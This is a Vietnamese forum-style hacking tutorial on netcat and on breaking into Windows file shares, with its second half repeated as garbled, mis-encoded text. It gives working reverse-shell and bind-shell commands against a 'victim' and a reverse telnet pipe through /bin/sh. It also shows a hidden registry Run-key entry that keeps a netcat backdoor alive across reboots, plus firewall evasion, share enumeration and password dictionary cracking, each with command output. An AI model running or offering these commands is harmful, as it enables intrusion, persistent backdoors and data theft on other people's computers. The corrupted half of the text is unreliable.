kiến thức về netcat hay
1. Giới thiệu Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó. Vì vậy bạn cần biết một chút về Netcat) 2. Biên dịch Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng. - hiệu chỉnh file netcat.c bằng vi: vi netcat.c + tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init(); + thêm 2 dòng sau vào phần #define (nằm ở đầu file): #define GAPING_SECURITY_HOLE #define TELNET - biên dịch: make linux - chạy thử: ./nc -h - nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ":." PATH=/sbin:/usr/sbin: :. Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong. 3. Các tùy chọn của Netcat Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số: C:>nc -h connect to somewhere: nc [-options] hostname port[s] [ports] listen for inbound: nc -l -p port [options] [hostname] [port] options: -d detach from console, stealth mode -e prog inbound program to exec [dangerous!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, -h this cruft -i secs delay interval for lines sent, ports scanned -l listen mode, for inbound connects -L listen harder, re-listen on socket close -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -z zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] * Cú pháp: - chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2] - chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng] * Một số tùy chọn: -d tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar) -e prog thi hành chương trình prog, thường dùng trong chế độ lắng nghe -h gọi hướng dẫn -i secs trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi -l đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến -L buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối. -n chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS -o file ghi nhật kí vào file -p port chỉ định cổng port -r yêu cầu Netcat chọn cổng ngẫu nhiên(random) -s addr giả mạo địa chỉ IP nguồn là addr -t không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd. -u dùng UDP(mặc định netcat dùng TCP) -v hiển thị chi tiết các thông tin về kết nối hiện tại. -vv sẽ hiển thị thông tin chi tiết hơn nữa. -w secs đặt thời gian timeout cho mỗi kết nối là secs mili giây -z chế độ zero I/O, thường được sử dụng khi scan port Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3, ,8080 4. Các ví dụ: 4.1 Chộp banner của web server Ví dụ: nc đến 172.16.84.2, cổng 80 C:>nc 172.16.84.2 80 HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần) HTTP/1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content-Type: text/html Để biết thông tin chi tiết về kết nối, bạn có thể dùng -v(-vv sẽ cho biết các thông tin chi tiết hơn nữa) C:>nc -vv 172.16.84.1 80 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [172.16.84.1] 80 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache/1.3.20 (Win32) Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: "0-cec-3899eaea" Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text/html sent 17, rcvd 245: NOTSOCK Nếu muốn ghi nhật kí, hãy dùng -o . Ví dụ: nc -vv -o nhat_ki.log 172.16.84.2 80 - xem file nhat_ki.log < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK. < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54 < 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT Server: Ap < 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win < 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32) Last-Modifi < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T ETag: "0-cec- < 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea" Accep < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes. < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length: < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308 Connectio < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close Conten < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm < 000000f0 6c 0d 0a 0d 0a # l dấu < nghĩa là server gởi đến netcat dấu > nghĩa là netcat gởi đến server 4.2 Quét cổng - chạy netcat với tùy chọn -z. Để quét cổng nhanh hơn, hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500) của host 172.16.106.1 [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 443 (?) open (UNKNOWN) [172.16.106.1] 139 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open (UNKNOWN) [172.16.106.1] 80 (?) open (UNKNOWN) [172.16.106.1] 23 (?) open - nếu bạn cần scan các cổng UDP, dùng -u [dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500 (UNKNOWN) [172.16.106.1] 1025 (?) open (UNKNOWN) [172.16.106.1] 1024 (?) open (UNKNOWN) [172.16.106.1] 138 (?) open (UNKNOWN) [172.16.106.1] 137 (?) open (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open 4.3 Biến Netcat thành một trojan - trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ: E:>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error - trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080 C:>nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp. E:>cd test cd test E:test>dir /w dir /w Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E:test [.] [ ] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 262,499 bytes 2 Dir(s) 191,488,000 bytes free C:test>exit exit sent 20, rcvd 450: NOTSOCK Như bạn thấy, chúng ta đã có thể làm gì mà chẳng được với máy của nạn nhân qua shell lệnh này?! Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thay cho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux. E:>nc -nvv -L -p 8080 -e cmd.exe listening on [any] 8080 - Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s <địa_chỉ_ip_của_máy_này>. Ví dụ: netstat -a TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe E:>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53 listening on [172.16.84.1] 53 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163 - Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong. - Chú ý: bạn không thể chạy netcat với -u -e cmd.exe hoặc u -e /bin/sh vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat. 5. Kĩ thuật tiên tiến 5.1 Telnet nghịch chuuyển - dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia. Ví dụ: - trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25: + cửa sổ Netcat (1) C:>nc -nvv -l -p 80 listennng on [any] 80 connect to [172.16.84.1] from [172.16.84.2] 1055 pwd ls -la _ + cửa sổ Netcat (2) C:>nc -nvv -l -p 25 listening on [any] 25 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056 / total 171 drwxr-xr-x 17 root root 4096 Feb 5 16:15 . drwxr-xr-x 17 root root 4096 Feb 5 16:15 drwxr-xr-x 2 root root 4096 Feb 5 08:55 b ( ²?n drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²? drwxr-xr-x 6 root root 4096 Feb 5 08:58 home drwxr-xr-x 6 root root 4096 Feb 5 08:50 l ( ²?b drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²? drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²? drwx 12 root root 4096 Feb 5 16:24 root drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb ( ²?n drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr drwxr-xr-x 18 root root 4096 Feb 5 08:52 var - trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất: [root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25 /bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found Trying 172.16.84.1 Connected to 172.16.84.1. Escape character is '^]'. _ Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2). Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc. 5.2 Tạo kênh sau Cũng tương tự như telnet nghịch chuyển. - trên máy tính dùng để tấn công, bạn đặt Netcat lắng nghe trên cổng 80 vì cổng này sẽ không bị firewall chặn: C:>nc -nvv -l -p 80 listennng on [any] 80 - tiếp theo, từ shell lệnh của máy nạn nhân, bạn nối Netcat đến máy dùng để tấn công với tùy chọn -e để đổ shell: E:>nc -e cmd.exe 172.16.84.1 80 Một khi máy nạn nhân thi hành chuổi lệnh trên, kênh sau nc sẽ được tạo, "nhét" shell (trong trường hợp này là cmd.exe) trở vào nc. Kể từ đây, chúng ta đã có 1 shell lệnh ảo. C:>nc -nvv -l -p 80 listenning pm [any] 80 connect to [172.16.84.1] from [UNKNOWN] [172.16.84.3] 1035 Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp. E:> 5.3 Đổi hướng cổng Bạn có thể dùng tunnel.pl hoặc fpipe.exe. Hãy xem ví dụ sau: - chạy nc trên cổng bất kì: E:>nc -nvv -L -p 1234 -e cmd.exe listening on [any] 1234 - chạy tunnel hoặc fpipe để đổi hướng cổng C:>perl tunnel.pl port=53 tohost=127.0.0.1 toport=1234 C:>fpipe -l 53 -r 1234 127.0.0.1 tunnel, fpipe sẽ lắng nghe trên cổng 53, sau đó chuyển tiếp kết nối đến 127.0.0.1:1024, đây là cổng mà netcat đang lắng nghe. Đổi hướng cổng là một cách để đi vòng qua firewalls. 6. Kết luận: Netcat rất tuyệt! ========================= vicki - nhomvicky.net [FONT='Verdana','sans-serif']Hacking PC resource share - Hướng đi và giải pháp.[/font] - 29/6/2005 5h:20 Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong phạm vi kiến thức của tui thôi nha). Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các packet,từ các packet có thể biết được địa chi IP nguồn) Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể. Vậy hacker làm như thế nào để Hack? Hacking thông qua resource share: Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …) Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn. Chỉ bằng vài dòng lệnh đơn giản trên comand line: CODE [C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết ) Shared resources at \\x.x.x.x Share name Type Used as Comment C Disk PRJA3 Disk The command completed successfully. C:\> Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS) Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?). Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào. Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào. Cũng bằng command line: CODE C:\> net use z: \\x.x.x.x \share The command completed successfully. Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password Lấy Username : CODE C:\> Nbtstat –A x.x.x.x NetBIOS Remote Machine Name Table Name Type Status ADMIN <00> UNIQUE Registered BODY <00> GROUP Registered ADMIN f <20> UNIQUE Registered BODY <1E> GROUP Registered BODY <1D> UNIQUE Registered __MSBROWSE__.<01> GROUP Registered MAC Address = 00-08-A1-5B-E3-8C Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt CODE “” ADMIN 123456 ADMIN 123456 BODY “” BODY … Sau đó hacker crack bang lệnh : [/code]Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh: CODE [...]... thụng tin ca Admin v Website ú Cụng c th 6 : Netcat l cụng c c v ghi d liu qua mng thụng qua giao thc TCP hoc UDP Bn cú th dựng Netcat 1 cỏch trc tip hoc s dng chng trỡnh script khỏc iu khin Netcat Netcat c coi nh 1 exploitation tool do nú cú th to c liờn kt gia bn v server cho vic c v ghi d liu ( tt nhiờn l khi Netcat ó c ci trờn 1 server b lI ) Mi thụng tin v Netcat bn cú th tham kho ti [FONT='Verdana','sansserif']http://www.l0pht.com/[/font]... thy thỡ c post bi hi , cỏc bn bờn ú s tr li cho bn 48.) Hng dn s dng Netcat : a ) Gii thiu : Netcat l mt cụng c khụng th thiu c nu bn mun hack mt website no ú vỡ nú rt mnh v tin dng Do ú bn cn bit mt chỳt v Netcat b ) Biờn dch : _ i vi bn Netcat cho Linux, bn phi biờn dch nú trc khi s dng - hiu chnh file netcat. c bng vi: vi netcat. c + tỡm dũng res_init(); trong main() v thờm vo trc 2 du ``/``:... #define TELNET - biờn dch: make linux - chy th: /nc -h - nu bn mun chy Netcat bng nc thay cho /nc, bn ch cn hiu chnh li bin mụi trng PATH trong file ~/.bashrc, thờm vo ``:.`` PATH=/sbin:/usr/sbin: : _ Bn Netcat cho Win khụng cn phi compile vỡ ó cú sn file nh phõn nc.exe Ch vy gii nộn v chy l xong c ) Cỏc tựy chn ca Netcat : _ Netcat chy ch dũng lnh Bn chy nc -h bit cỏc tham s: CODE C:\ > nc -h... [options] [hostname] [port] options: -d - tỏch Netcat khi ca s lnh hay l console, Netcat s chy ch steath(khụng hin th trờn thanh Taskbar) -e prog - thi hnh chng trỡnh prog, thng dựng trong ch lng nghe -h - gi hng dn -i secs - trỡ hoón secs mili giõy trc khi gi mt dũng d liu i -l - t Netcat vo ch lng nghe ch cỏc kt ni n -L buc Netcat ``c`` lng nghe Nú s lng nghe tr li sau mi... Windows NT, t Netcat ch lng nghe, khụng cn phi cú quyn Administrator, ch cn login vo vi 1 username bỡnh thng khi ng Netcat l xong Chỳ ý: bn khụng th chy netcat vi -u -e cmd.exe hoc -u -e /bin/sh vỡ netcat s khụng lm vic ỳng Nu bn mun cú mt UDP shell trờn Unix, hóy dựng udpshell thay cho netcat ( Da theo bi vit ca huynh Vicky ) 49.) K thut hack IIS server 5.0 : _ IIS server vi cỏc phiờn bn t trc n phiờn... telnet, netcat s khụng gi cỏc thụng tin ny n telnetd -u - dựng UDP(mc nh netcat dựng TCP) -v - hin th chi tit cỏc thụng tin v kt ni hin ti -vv - s hin th thụng tin chi tit hn na -w secs t thi gian timeout cho mi kt ni l secs mili giõy -z - ch zero I/O, thng c s dng khi scan port Netcat h tr phm vi cho s hiu cng Cỳ phỏp l cng1-cng2 Vớ d: 1-8080 ngha l 1,2,3, ,8080 d ) Tỡm hiu Netcat. .. Conten < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm < 000000f0 6c 0d 0a 0d 0a # l du < ngha l server gi n netcat du > ngha l netcat gi n server _ Quột cng : Bn hóy chy netcat vi tựy chn z Nhng quột cng nhanh hn, bn hóy dựng -n vỡ netcat s khụng cn thm vn DNS Vớ d scan cỏc cng TCP(1- > 500) ca host 172.16.106.1 CODE [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500 (UNKNOWN)... hoi ngi ta nhe) Vn l lm sao cho nhng ln sau victim bt mỏy tớnh lờn netcat t ng chy v lng nghe mnh lnh ca ta? Bn cú th cho netcat khi ng cựng windows "moi" file netcat. reg (dựng notepad v save li thnh reg) cú ni dung nh sau: CODE Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "netcat" ="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe" Sau ú copy sang... [172.16.106.1] 137 (?) open (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open _ Bin Netcat thnh mt trojan : Trờn mỏy tớnh ca nn nhõn, bn khi ng netcat vo ch lng nghe, dựng tựy chn l ( listen ) v -p port xỏc nh s hiu cng cn lng nghe, -e yờu cu netcat thi hnh 1 chng trỡnh khi cú 1 kt ni n, thng l shell lnh cmd.exe ( i vi NT) hoc /bin/sh(i vi Unix) Vớ... 192.168.16.7, Netcat s khụng thm vn DNS -o file ghi nht kớ vo file -p port - ch nh cng port -r yờu cu Netcat chn cng ngu nhiờn(random) -s addr - gi mo a ch IP ngun l addr -t - khụng gi cỏc thụng tin ph i trong mt phiờn telnet Khi bn telnet n mt telnet daemon(telnetd), telnetd thng yờu cu trỡnh telnet client ca bn gi n cỏc thụng tin ph nh bin mụi trng TERM, USER Nu bn s dng netcat vi tựy